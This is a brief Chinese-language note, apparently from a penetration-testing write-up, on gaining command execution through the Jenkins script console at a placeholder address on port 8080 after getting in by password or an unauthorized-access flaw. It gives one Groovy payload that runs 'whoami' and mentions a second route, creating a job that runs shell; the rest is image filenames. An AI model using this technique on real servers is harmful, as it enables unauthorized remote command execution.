1. 通过密码或者未授权访问漏洞进入后台 http://xx.xx.xx.xx:8080/script 执行命令 println "whoami".execute().text 1.png 1. 第二种方式 创建一个执行shell的任务 2.png 3.png 4.png 5.png 6.png